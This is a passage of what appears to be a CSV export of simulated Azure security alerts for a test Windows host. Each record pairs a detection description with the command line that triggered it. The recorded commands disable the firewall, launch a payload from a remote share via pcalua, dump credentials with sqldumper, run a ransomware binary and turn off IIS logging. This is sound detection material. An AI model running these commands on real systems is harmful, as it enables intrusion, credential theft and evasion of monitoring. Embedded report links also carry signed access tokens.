""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\netsh.exe firewall set opmode mode=disable profile=all"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x28c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x28c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\netsh.exe firewall set opmode mode=disable profile=all"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
115,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,ad1fd62a-9565-41e4-b94a-6264942033f6,2518547714811337754_ad1fd62a-9565-41e4-b94a-6264942033f6,Detection,Microsoft,Detected suspicious use of Pcalua.exe to launch executable code,Detected suspicious use of Pcalua.exe to launch executable code,Detected suspicious use of Pcalua.exe to launch executable code,"Analysis of host data on MSTICALERTSWIN1 detected the use of pcalua.exe to launch executable code. Pcalua.exe is a component of the Microsoft Windows ""Program Compatibility Assistant"" which detects compatibility issues during the installation or execution of a program. Attackers are known to abuse functionality of legitimate Windows system tools to perform malicious actions, for example using pcalua.exe with the -a switch to launch malicious executables either locally or from remote shares.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\pcalua.exe"",
""Suspicious Command Line"": ""pcalua.exe -a \\\\server\\payload.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1464"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""pcalua.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1464"",
""CommandLine"": ""pcalua.exe -a \\\\server\\payload.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
116,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,38d53571-e98a-4bb6-a17f-0361a561019e,2518547714814533914_38d53571-e98a-4bb6-a17f-0361a561019e,Detection,Microsoft,Detected possible execution of keygen executable,Detected possible execution of keygen executable,Detected possible execution of keygen executable,Analysis of host data on MSTICALERTSWIN1 detected execution of a process whose name is indicative of a keygen tool; such tools are typically used to defeat software licencing mechanisms but their download is often bundled with other malicious software. Activity group GOLD has been known to make use of such keygens to covertly gain back door access to hosts that they compromise.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17f8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""a_keygen.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17f8"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
117,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,5b42a152-64c2-4f16-8cc3-887b8b0161fc,2518547714811804858_5b42a152-64c2-4f16-8cc3-887b8b0161fc,Detection,Microsoft,Detected suspicious execution of VBScript.Encode command,Detected suspicious execution of VBScript.Encode command,Detected suspicious execution of VBScript.Encode command,"Analysis of host data on MSTICALERTSWIN1 detected the execution of VBScript.Encode command. This encodes the scripts into unreadable text, making it more difficult for users to examine the code. Microsoft threat research shows that attackers often use encoded VBscript files as part of their attack to evade detection systems. This could be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo /e:vbscript.encode /b"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x147c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x147c"",
""CommandLine"": ""cmd /c echo /e:vbscript.encode /b"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
118,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:19,2019-01-15 05:15:19,76bf04a5-71fa-487a-9742-d54941a7a194,2518547714809416002_76bf04a5-71fa-487a-9742-d54941a7a194,Detection,Microsoft,Possible credential dumping detected,Possible credential dumping detected,Possible credential dumping detected,Analysis of host data has detected use of a native Windows tool (e.g. sqldumper.exe) being used in a way that allows credentials to be extracted from memory. Oftentimes attackers use these techniques to extract credentials that they then use for lateral movement and privilege escalation.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\sqldumper.exe"",
""Suspicious Command Line"": ""sqldumper.exe 464 0 0x0110:40"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""sqldumper.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e8"",
""CommandLine"": ""sqldumper.exe 464 0 0x0110:40"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""EndTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
119,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,d5e026fa-6687-495e-878d-c4c93477cc78,2518547714812286467_d5e026fa-6687-495e-878d-c4c93477cc78,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock-screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1404"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=tL87fydg2X3ANo7oW3HGLc%2BTDgcnvawDxPkkDILtH7Q%3D&spr=https&st=2019-01-14T17:39:21Z&se=2019-04-14T17:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1404"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
120,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,8df27789-fb10-4035-ac48-cd0883b2e6b0,2518547714831067013_8df27789-fb10-4035-ac48-cd0883b2e6b0,Detection,Microsoft,Detected actions indicative of disabling and deleting IIS log files.,Detected actions indicative of disabling and deleting IIS log files.,Detected actions indicative of disabling and deleting IIS log files.,Analysis of host data detected actions that show IIS log files being disabled and/or deleted.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&c:\\windows\\system32\\inetsrv\\appcmd set config \""default web site/\"" /section:httplogging /dontlog:true&echo [s]&cd&echo [e]\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14ec"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14ec"",
""CommandLine"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&c:\\windows\\system32\\inetsrv\\appcmd set config \""default web site/\"" /section:httplogging /dontlog:true&echo [s]&cd&echo [e]\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
121,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,9a34d332-2fb6-4f3f-beb0-d9817dc9b7cd,2518547714815009424_9a34d332-2fb6-4f3f-beb0-d9817dc9b7cd,Detection,Microsoft,Detected possible execution of malware dropper,Detected possible execution of malware dropper,Detected possible execution of malware dropper,Analysis of host data on MSTICALERTSWIN1 detected a filename that has previously been associated with one of activity group GOLD's methods of installing malware on a victim host.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17a8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=vAwQabeTf42yaWjRqLZXxfkyAHl%2B97yko7Ag7o9mKl4%3D&spr=https&st=2019-01-14T11:45:20Z&se=2019-04-14T12:00:20Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""2840.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17a8"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
122,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,58694b54-2bee-4160-9595-30903b466f6e,2518547714825070946_58694b54-2bee-4160-9595-30903b466f6e,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often uses SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1630"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=1uKLWM0uhSH97fMjwKzETgt80a8Adpp8YeURexaRhxI%3D&spr=https&st=2019-01-14T14:16:16Z&se=2019-04-14T14:31:16Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
